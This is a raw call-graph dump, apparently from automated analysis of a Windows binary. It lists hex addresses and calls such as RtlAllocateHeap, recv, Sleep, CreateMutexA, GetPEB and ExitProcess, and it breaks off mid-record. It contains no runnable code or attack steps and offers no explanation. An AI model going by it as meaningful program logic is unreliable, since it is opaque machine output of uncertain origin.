10983->10996 10984 b9b598 10992 b9af56 10984->10992 10988 b8242a 10988->10938 11000 bb4f29 10989->11000 10991 b9b555 10991->10983 10991->10984 10991->10988 10993 b9af9f ___std_exception_copy 10992->10993 10995 b9afb2 shared_ptr 10993->10995 11012 b9b39f 10993->11012 10995->10988 10997 b9b1d8 10996->10997 10999 b9b1e1 shared_ptr 10996->10999 10998 b9b39f 5 API calls 10997->10998 10998->10999 10999->10988 11007 bb4f37 11000->11007 11002 bb4f2e __cftof 11002->10991 11003 bbd634 __cftof 4 API calls 11002->11003 11006 bb8bfc ___std_exception_copy 11002->11006 11003->11006 11004 bb65ed __cftof 3 API calls 11005 bb8c2f 11004->11005 11006->11004 11008 bb4f40 11007->11008 11009 bb4f43 11007->11009 11008->11002 11010 bb8ba3 ___std_exception_destroy RtlAllocateHeap 11009->11010 11011 bb4f77 11009->11011 11010->11011 11011->11002 11013 b9bedf InitOnceExecuteOnce 11012->11013 11014 b9b3e1 11013->11014 11015 b9b3e8 11014->11015 11023 bb6cbb 11014->11023 11015->10995 11024 bb6cc7 __dosmaperr 11023->11024 11025 bba671 __cftof 4 API calls 11024->11025 11028 bb6ccc 11025->11028 11026 bb8bec __cftof 4 API calls 11027 bb6cf6 11026->11027 11028->11026 11069 b98680 11070 b986e0 11069->11070 11070->11070 11078 b97760 11070->11078 11072 b986f9 11073 b98f40 RtlAllocateHeap 11072->11073 11074 b98714 11072->11074 11073->11074 11075 b98f40 RtlAllocateHeap 11074->11075 11077 b98769 11074->11077 11076 b987b1 11075->11076 11079 b97864 shared_ptr __cftof 11078->11079 11081 b9777b 11078->11081 11079->11072 11080 b978f1 11082 b99270 RtlAllocateHeap 11080->11082 11081->11079 11081->11080 11085 b977ea 11081->11085 11086 b97811 11081->11086 11091 b977fb __cftof 11081->11091 11083 b978f6 11082->11083 11084 b82480 RtlAllocateHeap 11083->11084 11087 b978fb 11084->11087 11085->11083 11089 b9d3e2 RtlAllocateHeap 11085->11089 11088 b9d3e2 RtlAllocateHeap 11086->11088 11086->11091 11088->11091 11089->11091 11090 bb6c6a RtlAllocateHeap 11090->11080 11091->11079 11091->11090 11092 b8a682 11093 b8a68a shared_ptr 11092->11093 11094 b8a75d shared_ptr 11093->11094 11095 b8a949 11093->11095 11099 b980c0 RtlAllocateHeap 11094->11099 11096 bb6c6a RtlAllocateHeap 11095->11096 11097 b8a94e 11096->11097 11098 bb6c6a RtlAllocateHeap 11097->11098 11100 b8a953 Sleep CreateMutexA 11098->11100 11101 b8a903 11099->11101 11102 b8a98e 11100->11102 11107 bc44f2 11108 bc450c 11107->11108 11109 bc44ff 11107->11109 11111 bb75f6 __dosmaperr RtlAllocateHeap 11108->11111 11113 bc4518 11108->11113 11110 bb75f6 __dosmaperr RtlAllocateHeap 11109->11110 11112 bc4504 11110->11112 11114 bc4539 11111->11114 11115 bb6c5a ___std_exception_copy RtlAllocateHeap 11114->11115 11115->11112 11116 b86ae9 11120 b86b01 11116->11120 11117 b980c0 RtlAllocateHeap 11118 b86bac 11117->11118 11119 b99280 RtlAllocateHeap 11118->11119 11121 b86bbd shared_ptr 11119->11121 11120->11117 11120->11121 11122 b980c0 RtlAllocateHeap 11121->11122 11123 b86ce3 shared_ptr __floor_pentium4 11122->11123 11172 b89adc 11173 b89aea shared_ptr 11172->11173 11174 b8a917 11173->11174 11177 b89b4b shared_ptr 11173->11177 11175 b8a953 Sleep CreateMutexA 11174->11175 11176 bb6c6a RtlAllocateHeap 11174->11176 11180 b8a98e 11175->11180 11176->11175 11178 b89b59 11177->11178 11179 b89b65 11177->11179 11183 b980c0 RtlAllocateHeap 11178->11183 11181 b97a00 RtlAllocateHeap 11179->11181 11182 b89b74 11181->11182 11184 b85c10 4 API calls 11182->11184 11185 b8a903 11183->11185 11186 b89b7c 11184->11186 11187 b88b30 4 API calls 11186->11187 11188 b89b8d 11187->11188 11189 b98220 RtlAllocateHeap 11188->11189 11190 b89b9c 11189->11190 11191 b97a00 RtlAllocateHeap 11190->11191 11192 b89ca9 11191->11192 11193 b85c10 4 API calls 11192->11193 11194 b89cb1 11193->11194 11195 b88b30 4 API calls 11194->11195 11196 b89cc2 11195->11196 11197 b98220 RtlAllocateHeap 11196->11197 11198 b89cd1 11197->11198 11204 b820c0 11205 b9c68b __Mtx_init_in_situ 2 API calls 11204->11205 11206 b820cc 11205->11206 11207 b9d64e RtlAllocateHeap 11206->11207 11208 b820d6 11207->11208 11219 b8e0c0 recv 11220 b8e122 recv 11219->11220 11221 b8e157 recv 11220->11221 11223 b8e191 11221->11223 11222 b8e2b3 __floor_pentium4 11223->11222 11224 b9c6ac GetSystemTimePreciseAsFileTime 11223->11224 11225 b8e2ee 11224->11225 11226 b9c26a 5 API calls 11225->11226 11227 b8e358 11226->11227 11228 b82ec0 11229 b82f06 11228->11229 11232 b82f6f 11228->11232 11230 b9c6ac GetSystemTimePreciseAsFileTime 11229->11230 11231 b82f12 11230->11231 11234 b82f1d 11231->11234 11235 b8301e 11231->11235 11233 b82fef 11232->11233 11241 b9c6ac GetSystemTimePreciseAsFileTime 11232->11241 11238 b9d3e2 RtlAllocateHeap 11234->11238 11240 b82f30 __Mtx_unlock 11234->11240 11236 b9c26a 5 API calls 11235->11236 11237 b83024 11236->11237 11239 b9c26a 5 API calls 11237->11239 11238->11240 11242 b82fb9 11239->11242 11240->11232 11240->11237 11241->11242 11243 b9c26a 5 API calls 11242->11243 11244 b82fc0 __Mtx_unlock 11242->11244 11243->11244 11245 b9c26a 5 API calls 11244->11245 11246 b82fd8 __Cnd_broadcast 11244->11246 11245->11246 11246->11233 11247 b9c26a 5 API calls 11246->11247 11248 b8303c 11247->11248 11249 b9c6ac GetSystemTimePreciseAsFileTime 11248->11249 11260 b83080 shared_ptr __Mtx_unlock 11249->11260 11250 b831c5 11251 b9c26a 5 API calls 11250->11251 11252 b831cb 11251->11252 11253 b9c26a 5 API calls 11252->11253 11254 b831d1 11253->11254 11255 b9c26a 5 API calls 11254->11255 11256 b83193 __Mtx_unlock 11255->11256 11257 b831a7 __floor_pentium4 11256->11257 11258 b9c26a 5 API calls 11256->11258 11259 b831dd 11258->11259 11260->11250 11260->11252 11260->11257 11261 b9c6ac GetSystemTimePreciseAsFileTime 11260->11261 11262 b8315f 11261->11262 11262->11250 11262->11254 11262->11256 11263 b9bd4c GetSystemTimePreciseAsFileTime 11262->11263 11263->11262 11289 b9d0c7 11291 b9d0d7 11289->11291 11290 b9d17f 11291->11290 11292 b9d17b RtlWakeAllConditionVariable 11291->11292 9728 bb6629 9731 bb64c7 9728->9731 9732 bb64d5 __cftof 9731->9732 9733 bb6520 9732->9733 9736 bb652b 9732->9736 9735 bb652a 9742 bba302 GetPEB 9736->9742 9738 bb6535 9739 bb653a GetPEB 9738->9739 9740 bb654a __cftof 9738->9740 9739->9740 9741 bb6562 ExitProcess 9740->9741 9743 bba31c __cftof 9742->9743 9743->9738 9744 bbd82f 9747 bbd83c __dosmaperr 9744->9747 9745 bbd867 RtlAllocateHeap 9746 bbd87a __dosmaperr 9745->9746 9745->9747 9747->9745 9747->9746 11301 b81020 11302 b980c0 RtlAllocateHeap 11301->11302 11303 b81031 11302->11303 11304 b9d64e RtlAllocateHeap 11303->11304 11305 b8103b 11304->11305 11339 b8a418 11342 b8a420 shared_ptr 11339->11342 11340 b8a4f3 shared_ptr 11346 b980c0 RtlAllocateHeap 11340->11346 11341 b8a93f 11343 bb6c6a RtlAllocateHeap 11341->11343 11342->11340 11342->11341 11344 b8a944 11343->11344 11345 bb6c6a RtlAllocateHeap 11344->11345 11347 b8a949 11345->11347 11348 b8a903 11346->11348 11349 bb6c6a RtlAllocateHeap 11347->11349 11350 b8a94e 11349->11350 11351 bb6c6a RtlAllocateHeap 11350->11351 11352 b8a953 Sleep CreateMutexA 11351->11352 11353 b8a98e 11352->11353 11380 b81000 11381 b9d64e RtlAllocateHeap 11380->11381 11382 b8100a 11381->11382 11388 b82e00 11389 b82e28 11388->11389 11390 b9c68b __Mtx_init_in_situ 2 API calls 11389->11390 11391 b82e33 11390->11391 11416 b8cc79 11417 b8cc84 shared_ptr 11416->11417 11418 b8ccda shared_ptr __floor_pentium4 11417->11418 11419 bb6c6a RtlAllocateHeap 11417->11419 11420 b8ce36 11419->11420 11421 b97a00 RtlAllocateHeap 11420->11421 11422 b8ce92 11421->11422 11423 b85c10 4 API calls 11422->11423 11424 b8ce9d 11423->11424 11426 b8ca70 11424->11426 11427 b8cadd 11426->11427 11428 b97a00 RtlAllocateHeap 11427->11428 11445 b8cc87 11427->11445 11429 b8ccee 11428->11429 11431 b85c10 4 API calls 11429->11431 11430 b8ccda shared_ptr __floor_pentium4 11432 b8ccf9 11431->11432 11446 b89030 11432->11446 11433 bb6c6a RtlAllocateHeap 11435 b8ce36 11433->11435 11437 b97a00 RtlAllocateHeap 11435->11437 11436 b8cd0d 11438 b98220 RtlAllocateHeap 11436->11438 11439 b8ce92 11437->11439 11440 b8cd1f 11438->11440 11441 b85c10 4 API calls 11439->11441 11444 b98f40 RtlAllocateHeap 11440->11444 11442 b8ce9d 11441->11442 11443 b8ca70 4 API calls 11442->11443 11444->11445 11445->11430 11445->11433 11447 b89080 11446->11447 11448 b97a00 RtlAllocateHeap 11447->11448 11449 b8908f 11448->11449 11450 b85c10 4 API calls 11449->11450 11451 b8909a 11450->11451 11452 b980c0 RtlAllocateHeap 11451->11452 11453 b890ec 11452->11453 11454 b98220 RtlAllocateHeap 11453->11454 11455 b890fe shared_ptr 11454->11455 11456 b8917e shared_ptr __floor_pentium4 11455->11456 11457 bb6c6a RtlAllocateHeap 11455->11457 11456->11436 11458 b891aa 11457->11458 11468 b84276 11469 b82410 5 API calls 11468->11469 11470 b8427f 11469->11470 11471 b83ce0 RtlAllocateHeap 11470->11471 11472 b8428f 11471->11472 11518 b9be50 11521 b9bd8b 11518->11521 11520 b9be66 std::_Throw_future_error 11522 b822e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11521->11522 11523 b9bd9f 11522->11523 11523->11520 9748 b8a856 9749 b8a870 9748->9749 9756 b8a892 shared_ptr 9748->9756 9750 b8a94e 9749->9750 9749->9756 9757 bb6c6a 9750->9757 9753 b8a953 Sleep CreateMutexA 9755 b8a98e 9753->9755 9754 b8a903 9760 b980c0 9756->9760 9775 bb6bf6 9757->9775 9759 bb6c79 ___std_exception_copy 9763 b98104 9760->9763 9764 b980de 9760->9764 9761 b981ee 9934 b99270 9761->9934 9763->9761 9766 b98158 9763->9766 9767 b9817d 9763->9767 9764->9754 9765 b981f3 9937 b82480 9765->9937 9766->9765 9929 b9d3e2 9766->9929 9771 b9d3e2 RtlAllocateHeap 9767->9771 9772 b98169 __cftof 9767->9772 9771->9772 9773 bb6c6a RtlAllocateHeap 9772->9773 9774 b981d0 shared_ptr 9772->9774 9773->9761 9774->9754 9781 bba7c8 9775->9781 9777 bb6c01 ___std_exception_copy 9778 bb6c0f 9777->9778 9779 bb6bf6 ___std_exception_copy RtlAllocateHeap 9777->9779 9778->9759 9780 bb6c66 9779->9780 9780->9759 9782 bba7d2 __dosmaperr 9781->9782 9785 bba7eb 9782->9785 9792 bbd82f 9782->9792 9784 bba81b __dosmaperr 9796 bbadf5 9784->9796 9785->9777 9786 bba813 __dosmaperr 9786->9784 9787 bba853 9786->9787 9800 bba49f 9787->9800 9791 bbadf5 __freea RtlAllocateHeap 9791->9785 9795 bbd83c __dosmaperr 9792->9795 9793 bbd867 RtlAllocateHeap 9794 bbd87a __dosmaperr 9793->9794 9793->9795 9794->9786 9795->9793 9795->9794 9797 bbae00 9796->9797 9799 bbae1b __dosmaperr 9796->9799 9797->9799 9804 bb75f6 9797->9804 9799->9785 9801 bba50d __dosmaperr 9800->9801 9807 bba445 9801->9807 9803 bba536 9803->9791 9805 bba7c8 __dosmaperr RtlAllocateHeap 9804->9805 9806 bb75fb 9805->9806 9806->9799 9808 bba451 __dosmaperr 9807->9808 9811 bba626 9808->9811 9810 bba473 __dosmaperr 9810->9803 9812 bba635 __cftof 9811->9812 9813 bba65c __cftof 9811->9813 9812->9813 9815 bbf35f 9812->9815 9813->9810 9817 bbf3df 9815->9817 9818 bbf375 9815->9818 9820 bbadf5 __freea RtlAllocateHeap 9817->9820 9842 bbf42d 9817->9842 9818->9817 9823 bbf3a8 9818->9823 9826 bbadf5 __freea RtlAllocateHeap 9818->9826 9819 bbf43b 9830 bbf49b 9819->9830 9839 bbadf5 RtlAllocateHeap __freea 9819->9839 9821 bbf401 9820->9821 9822 bbadf5 __freea RtlAllocateHeap 9821->9822 9824 bbf414 9822->9824 9827 bbadf5 __freea RtlAllocateHeap 9823->9827 9841 bbf3ca 9823->9841 9828 bbadf5 __freea RtlAllocateHeap 9824->9828 9825 bbadf5 __freea RtlAllocateHeap 9829 bbf3d4 9825->9829 9831 bbf39d 9826->9831 9832 bbf3bf 9827->9832 9833 bbf422 9828->9833 9834 bbadf5 __freea RtlAllocateHeap 9829->9834 9835 bbadf5 __freea RtlAllocateHeap 9830->9835 9843 bbef3c 9831->9843 9871 bbf03a 9832->9871 9838 bbadf5 __freea RtlAllocateHeap 9833->9838 9834->9817 9840 bbf4a1 9835->9840 9838->9842 9839->9819 9840->9813 9841->9825 9883 bbf4d0 9842->9883 9844 bbef4d 9843->9844 9870 bbf036 9843->9870 9845 bbef5e 9844->9845 9846 bbadf5 __freea RtlAllocateHeap 9844->9846 9847 bbef70 9845->9847 9848 bbadf5 __freea RtlAllocateHeap 9845->9848 9846->9845 9849 bbef82 9847->9849 9850 bbadf5 __freea RtlAllocateHeap 9847->9850 9848->9847 9851 bbef94 9849->9851 9852 bbadf5 __freea RtlAllocateHeap 9849->9852 9850->9849 9853 bbadf5 __freea RtlAllocateHeap 9851->9853 9855 bbefa6 9851->9855 9852->9851 9853->9855 9854 bbefb8 9857 bbefca 9854->9857 9858 bbadf5 __freea RtlAllocateHeap 9854->9858 9855->9854 9856 bbadf5 __freea RtlAllocateHeap 9855->9856 9856->9854 9859 bbefdc 9857->9859 9860 bbadf5 __freea RtlAllocateHeap 9857->9860 9858->9857 9861 bbefee 9859->9861 9862 bbadf5 __freea RtlAllocateHeap 9859->9862 9860->9859 9863 bbf000 9861->9863 9864 bbadf5 __freea RtlAllocateHeap 9861->9864 9862->9861 9865 bbf012 9863->9865 9866 bbadf5 __freea RtlAllocateHeap 9863->9866 9864->9863 9867 bbf024 9865->9867 9868 bbadf5 __freea RtlAllocateHeap 9865->9868 9866->9865 9869 bbadf5 __freea RtlAllocateHeap 9867->9869 9867->9870 9868->9867 9869->9870 9870->9823 9872 bbf09f 9871->9872 9873 bbf047 9871->9873 9872->9841 9874 bbf057 9873->9874 9875 bbadf5 __freea RtlAllocateHeap 9873->9875 9876 bbf069 9874->9876 9877 bbadf5 __freea RtlAllocateHeap 9874->9877 9875->9874 9878 bbf07b 9876->9878 9880 bbadf5 __freea RtlAllocateHeap 9876->9880 9877->9876 9879 bbf08d 9878->9879 9881 bbadf5 __freea RtlAllocateHeap 9878->9881 9879->9872 9882 bbadf5 __freea RtlAllocateHeap 9879->9882 9880->9878 9881->9879 9882->9872 9884 bbf4fc 9883->9884 9885 bbf4dd 9883->9885 9884->9819 9885->9884 9889 bbf0db 9885->9889 9888 bbadf5 __freea RtlAllocateHeap 9888->9884 9890 bbf1b9 9889->9890 9891 bbf0ec 9889->9891 9890->9888 9925 bbf0a3 9891->9925 9894 bbf0a3 __cftof RtlAllocateHeap 9895 bbf0ff 9894->9895 9896 bbf0a3 __cftof RtlAllocateHeap 9895->9896 9897 bbf10a 9896->9897 9898 bbf0a3 __cftof RtlAllocateHeap 9897->9898 9899 bbf115 9898->9899 9900 bbf0a3 __cftof RtlAllocateHeap 9899->9900 9901 bbf123 9900->9901 9902 bbadf5 __freea RtlAllocateHeap 9901->9902 9903 bbf12e 9902->9903 9904 bbadf5 __freea RtlAllocateHeap 9903->9904 9905 bbf139 9904->9905 9906 bbadf5 __freea RtlAllocateHeap 9905->9906 9907 bbf144 9906->9907 9908 bbf0a3 __cftof RtlAllocateHeap 9907->9908 9909 bbf152 9908->9909 9910 bbf0a3 __cftof RtlAllocateHeap 9909->9910 9911 bbf160 9910->9911 9912 bbf0a3 __cftof RtlAllocateHeap 9911->9912 9913 bbf171 9912->9913 9914 bbf0a3 __cftof RtlAllocateHeap 9913->9914 9915 bbf17f 9914->9915 9916 bbf0a3 __cftof RtlAllocateHeap 9915->9916 9917 bbf18d 9916->9917 9918 bbadf5 __freea RtlAllocateHeap 9917->9918 9919 bbf198 9918->9919 9920 bbadf5 __freea RtlAllocateHeap 9919->9920 9921 bbf1a3 9920->9921 9922 bbadf5 __freea RtlAllocateHeap 9921->9922 9923 bbf1ae 9922->9923 9924 bbadf5 __freea RtlAllocateHeap 9923->9924 9924->9890 9926 bbf0d6 9925->9926 9927 bbf0c6 9925->9927 9926->9894 9927->9926 9928 bbadf5 __freea RtlAllocateHeap 9927->9928 9928->9927 9930 b82480 __dosmaperr ___std_exception_copy std::_Throw_future_error 9929->9930 9931 b9d401 std::_Throw_future_error 9930->9931 9941 bb38af 9930->9941 9931->9772 9962 b9c1b9 9934->9962 9938 b8248e std::_Throw_future_error 9937->9938 9939 bb38af ___std_exception_copy RtlAllocateHeap 9938->9939 9940 b824c3 9939->9940 9942 bb38bc ___std_exception_copy 9941->9942 9946 b824c3 9941->9946 9943 bb38e9 9942->9943 9942->9946 9947 bba1f1 9942->9947 9956 bb8ba3 9943->9956 9946->9772 9948 bba20c 9947->9948 9949 bba1fe 9947->9949 9950 bb75f6 __dosmaperr RtlAllocateHeap 9948->9950 9949->9948 9953 bba223 9949->9953 9951 bba214 9950->9951 9959 bb6c5a 9951->9959 9954 bba21e 9953->9954 9955 bb75f6 __dosmaperr RtlAllocateHeap 9953->9955 9954->9943 9955->9951 9957 bbadf5 __freea RtlAllocateHeap 9956->9957 9958 bb8bbb 9957->9958 9958->9946 9960 bb6bf6 ___std_exception_copy RtlAllocateHeap 9959->9960 9961 bb6c66 9960->9961 9961->9954 9965 b9c123 9962->9965 9964 b9c1ca std::_Throw_future_error 9968 b822e0 9965->9968 9967 b9c135 9967->9964 9969 bb38af ___std_exception_copy RtlAllocateHeap 9968->9969 9970 b82317 __floor_pentium4 9969->9970 9970->9967 11567 b83440 11572 b82b30 11567->11572 11569 b8344f std::_Throw_future_error 11570 bb38af ___std_exception_copy RtlAllocateHeap 11569->11570 11571 b83483 11570->11571 11573 bb38af ___std_exception_copy RtlAllocateHeap 11572->11573 11574 b82b68 __floor_pentium4 11573->11574 11574->11569 11575 b83840 11576 b838f6 11575->11576 11578 b8385f 11575->11578 11577 b83920 11585 b991e0 11577->11585 11578->11576 11578->11577 11580 b838cd shared_ptr 11578->11580 11583 b8391b 11578->11583 11582 b97d50 RtlAllocateHeap 11580->11582 11581 b83925 11582->11576 11584 bb6c6a RtlAllocateHeap 11583->11584 11584->11577 11586 b9c1b9 RtlAllocateHeap 11585->11586 11587 b991ea 11586->11587 11587->11581 11588 b83c47 11589 b83c51 11588->11589 11591 b832d0 6 API calls 11589->11591 11592 b83c5f 11589->11592 11590 b83c68 11591->11592 11592->11590 11593 b83810 4 API calls 11592->11593 11594 b83cdb 11593->11594 11595 b97d50 RtlAllocateHeap 11594->11595 11597 b83d52 11594->11597 11595->11597 11596 b9d3e2 RtlAllocateHeap 11598 b83d84 11596->11598 11597->11596 11599 b97d50 RtlAllocateHeap 11598->11599 11600 b83e03 11598->11600 11599->11600 11601 b83e9b shared_ptr 11600->11601 11602 bb6c6a RtlAllocateHeap 11600->11602 11603 b83ec1 11602->11603 11604 bb6a44 11605 bb6a5c 11604->11605 11606 bb6a52 11604->11606 11622 bb698d 11605->11622 11617 bbb655 11606->11617 11609 bb6a76 11625 bb68ed 11609->11625 11610 bb6a59 11613 bbb655 RtlAllocateHeap 11614 bb6a8a 11613->11614 11615 bbadf5 __freea RtlAllocateHeap 11614->11615 11616 bb6aa8 11614->11616 11615->11616 11618 bbb662 11617->11618 11619 bbb679 11618->11619 11628 bb75c0 11618->11628 11619->11610 11623 bb690a __cftof 4 API calls 11622->11623 11624 bb699f 11623->11624 11624->11609 11636 bb683b 11625->11636 11633 bb75e3 11628->11633 11630 bb75cb __dosmaperr 11631 bb75f6 __dosmaperr RtlAllocateHeap 11630->11631 11632 bb75de 11631->11632 11632->11610 11634 bba7c8 __dosmaperr RtlAllocateHeap 11633->11634 11635 bb75e8 11634->11635 11635->11630 11637 bb6849 11636->11637 11638 bb6863 11636->11638 11649 bb69cc 11637->11649 11640 bb686a 11638->11640 11642 bb6889 __cftof 11638->11642 11646 bb6853 11640->11646 11653 bb69e6 11640->11653 11643 bb689f __cftof 11642->11643 11644 bb69e6 RtlAllocateHeap 11642->11644 11645 bb75c0 __dosmaperr RtlAllocateHeap 11643->11645 11643->11646 11644->11643 11647 bb68ab 11645->11647 11646->11613 11646->11614 11648 bb75f6 __dosmaperr RtlAllocateHeap 11647->11648 11648->11646 11650 bb69d7 11649->11650 11652 bb69df 11649->11652 11651 bbadf5 __freea RtlAllocateHeap 11650->11651 11651->11652 11652->11646 11654 bb69cc RtlAllocateHeap 11653->11654 11655 bb69f4 11654->11655 11658 bb6a25 11655->11658 11659 bbb04b __cftof RtlAllocateHeap 11658->11659 11660 bb6a05 11659->11660 11660->11646 11661 bb8bbe 11664 bb8868 11661->11664 11665 bb868d RtlAllocateHeap 11664->11665 11668 bb887a 11665->11668 11666 bb88b3 11667 bb690a __cftof 4 API calls 11666->11667 11674 bb88bf 11667->11674 11668->11666 11669 bb888f 11668->11669 11681 bb889f 11668->11681 11670 bb75f6 __dosmaperr RtlAllocateHeap 11669->11670 11671 bb8894 11670->11671 11672 bb6c5a ___std_exception_copy RtlAllocateHeap 11671->11672 11672->11681 11673 bb6d52 4 API calls 11673->11674 11674->11673 11675 bb88ee 11674->11675 11678 bb8958 11675->11678 11682 bb8a8d 11675->11682 11676 bb8a8d RtlAllocateHeap 11679 bb8a20 11676->11679 11678->11676 11680 bb75f6 __dosmaperr RtlAllocateHeap 11679->11680 11679->11681 11680->11681 11683 bb8a9e 11682->11683 11684 bb8ab2 11682->11684 11683->11684 11685 bb75f6 __dosmaperr RtlAllocateHeap 11683->11685 11684->11678 11686 bb8aa7 11685->11686 11687 bb6c5a ___std_exception_copy RtlAllocateHeap 11686->11687 11687->11684 11692 b8b7b1 11693 b8b7be 11692->11693 11694 b97a00 RtlAllocateHeap 11693->11694 11695 b8b7f3 11694->11695 11696 b97a00 RtlAllocateHeap 11695->11696 11697 b8b80b 11696->11697 11698 b97a00 RtlAllocateHeap 11697->11698 11699 b8b823 11698->11699 11700 b97a00 RtlAllocateHeap 11699->11700 11701 b8b835 11700->11701 11702 bb67b7 11703 bb67c3 __dosmaperr 11702->11703 11704 bb67cd 11703->11704 11706 bb67e2 11703->11706 11705 bb75f6 __dosmaperr RtlAllocateHeap 11704->11705 11707 bb67d2 11705->11707 11710 bb67dd 11706->11710 11711 bb6740 11706->11711 11708 bb6c5a ___std_exception_copy RtlAllocateHeap 11707->11708 11708->11710 11712 bb674d 11711->11712 11713 bb6762 11711->11713 11714 bb75f6 __dosmaperr RtlAllocateHeap 11712->11714 11719 bb675d 11713->11719 11727 bba038 11713->11727 11715 bb6752 11714->11715 11717 bb6c5a ___std_exception_copy RtlAllocateHeap 11715->11717 11717->11719 11719->11710 11723 bb6785 11744 bbaebb 11723->11744 11726 bbadf5 __freea RtlAllocateHeap 11726->11719 11728 bba050 11727->11728 11732 bb6777 11727->11732 11729 bbafe4 RtlAllocateHeap 11728->11729 11728->11732 11730 bba06e 11729->11730 11759 bc0439 11730->11759 11733 bbb00b 11732->11733 11734 bbb022 11733->11734 11735 bb677f 11733->11735 11734->11735 11736 bbadf5 __freea RtlAllocateHeap 11734->11736 11737 bbafe4 11735->11737 11736->11735 11738 bbaff0 11737->11738 11739 bbb005 11737->11739 11740 bb75f6 __dosmaperr RtlAllocateHeap 11738->11740 11739->11723 11741 bbaff5 11740->11741 11742 bb6c5a ___std_exception_copy RtlAllocateHeap 11741->11742 11743 bbb000 11742->11743 11743->11723 11745 bbaecc 11744->11745 11746 bbaee1 11744->11746 11747 bb75e3 __dosmaperr RtlAllocateHeap 11745->11747 11748 bbaf2a 11746->11748 11752 bbaf08 11746->11752 11749 bbaed1 11747->11749 11750 bb75e3 __dosmaperr RtlAllocateHeap 11748->11750 11751 bb75f6 __dosmaperr RtlAllocateHeap 11749->11751 11753 bbaf2f 11750->11753 11756 bb678b 11751->11756 11777 bbae2f 11752->11777 11755 bb75f6 __dosmaperr RtlAllocateHeap 11753->11755 11757 bbaf37 11755->11757 11756->11719 11756->11726 11758 bb6c5a ___std_exception_copy RtlAllocateHeap 11757->11758 11758->11756 11760 bc0445 __dosmaperr 11759->11760 11761 bc044d 11760->11761 11762 bc0465 11760->11762 11764 bb75e3 __dosmaperr RtlAllocateHeap 11761->11764 11763 bc0500 11762->11763 11772 bc0497 11762->11772 11765 bb75e3 __dosmaperr RtlAllocateHeap 11763->11765 11766 bc0452 11764->11766 11767 bc0505 11765->11767 11768 bb75f6 __dosmaperr RtlAllocateHeap 11766->11768 11769 bb75f6 __dosmaperr RtlAllocateHeap 11767->11769 11770 bc045a 11768->11770 11771 bc050d 11769->11771 11770->11732 11773 bb6c5a ___std_exception_copy RtlAllocateHeap 11771->11773 11772->11770 11774 bb75f6 __dosmaperr RtlAllocateHeap 11772->11774 11773->11770 11775 bc04be 11774->11775 11776 bb75e3 __dosmaperr RtlAllocateHeap 11775->11776 11776->11770 11778 bbae3b __dosmaperr 11777->11778 11779 bbae7b 11778->11779 11780 bbae70 11778->11780 11782 bb75f6 __dosmaperr RtlAllocateHeap 11779->11782 11784 bbaf48 11780->11784 11783 bbae76 11782->11783 11783->11756 11795 bbc0de 11784->11795 11786 bbaf58 11787 bbaf90 11786->11787 11788 bbaf5e 11786->11788 11789 bbc0de RtlAllocateHeap 11786->11789 11787->11788 11790 bbc0de RtlAllocateHeap 11787->11790 11791 bbafd8 11788->11791 11793 bb75c0 __dosmaperr RtlAllocateHeap 11788->11793 11792 bbaf87 11789->11792 11790->11788 11791->11783 11794 bbc0de RtlAllocateHeap 11792->11794 11793->11791 11794->11787 11796 bbc0eb 11795->11796 11797 bbc100 11795->11797 11798 bb75e3 __dosmaperr RtlAllocateHeap 11796->11798 11799 bb75e3 __dosmaperr RtlAllocateHeap 11797->11799 11801 bbc125 11797->11801 11800 bbc0f0 11798->11800 11802 bbc130 11799->11802 11803 bb75f6 __dosmaperr RtlAllocateHeap 11800->11803 11801->11786 11804 bb75f6 __dosmaperr RtlAllocateHeap 11802->11804 11805 bbc0f8 11803->11805 11806 bbc138 11804->11806 11805->11786 11807 bb6c5a ___std_exception_copy RtlAllocateHeap 11806->11807 11807->11805 11808 b86db5 11809 b86dc2 11808->11809 11810 b86dca 11809->11810 11811 b86df5 11809->11811 11812 b980c0 RtlAllocateHeap 11810->11812 11814 b980c0 RtlAllocateHeap 11811->11814 11813 b86deb shared_ptr 11812->11813 11815 b86ec1 shared_ptr 11813->11815 11816 bb6c6a RtlAllocateHeap 11813->11816 11814->11813 11817 b86ee3 11816->11817 11867 b89ba5 11868 b89ba7 11867->11868 11869 b97a00 RtlAllocateHeap 11868->11869 11870 b89ca9 11869->11870 11871 b85c10 4 API calls 11870->11871 11872 b89cb1 11871->11872 11873 b88b30 4 API calls 11872->11873 11874 b89cc2 11873->11874 11875 b98220 RtlAllocateHeap 11874->11875 11876 b89cd1 11875->11876 11877 b83f9f 11878 b83fad 11877->11878 11879 b83fc5 11877->11879 11880 b82410 5 API calls 11878->11880 11881 b83fb6 11880->11881 11882 b83ce0 RtlAllocateHeap 11881->11882 11882->11879 11886 b82b90 11887 b82bce 11886->11887 11890 b9b7fb 11887->11890 11889 b82bdb shared_ptr __floor_pentium4 11891 b9b817 11890->11891 11892 b9b807 11890->11892 11891->11889 11892->11891 11894 b9ca78 11892->11894 11895 b9ca8d TpReleaseWork 11894->11895 11895->11891 11921 b88980 11925 b889d8 shared_ptr 11921->11925 11931 b88aea 11921->11931 11922 b97a00 RtlAllocateHeap 11922->11925 11923 b85c10 4 API calls 11923->11925 11924 b88b20 11927 b98200 RtlAllocateHeap 11924->11927 11925->11922 11925->11923 11925->11924 11926 b980c0 RtlAllocateHeap 11925->11926 11928 b88b25 11925->11928 11925->11931 11926->11925 11927->11928 11929 bb6c6a RtlAllocateHeap 11928->11929 11930 b88b2a 11929->11930 11950 b855f0 11951 b85610 11950->11951 11951->11951 11952 b822c0 4 API calls 11951->11952 11953 b85710 __floor_pentium4 11951->11953 11952->11951 11954 b843f0 11955 b9bedf InitOnceExecuteOnce 11954->11955 11956 b8440a 11955->11956 11957 b84411 11956->11957 11958 bb6cbb 4 API calls 11956->11958 11959 b84424 11958->11959 12000 b83fe0 12001 b84022 12000->12001 12002 b8408c 12001->12002 12003 b840d2 12001->12003 12006 b84035 __floor_pentium4 12001->12006 12007 b835e0 12002->12007 12018 b83ee0 12003->12018 12008 b9d3e2 RtlAllocateHeap 12007->12008 12009 b83616 12008->12009 12010 b8364e 12009->12010 12011 b83691 12009->12011 12014 b9c17c Concurrency::cancel_current_task RtlAllocateHeap 12010->12014 12017 b83663 shared_ptr __floor_pentium4 12010->12017 12024 b82ce0 12011->12024 12013 b8369e 12013->12017 12033 b82c00 12013->12033 12015 b83720 12014->12015 12015->12006 12017->12006 12019 b83f48 12018->12019 12021 b83f1e 12018->12021 12020 b82c00 4 API calls 12019->12020 12022 b83f58 12019->12022 12023 b83f7f 12020->12023 12021->12006 12022->12006 12023->12006 12025 b82d1d 12024->12025 12026 b9bedf InitOnceExecuteOnce 12025->12026 12027 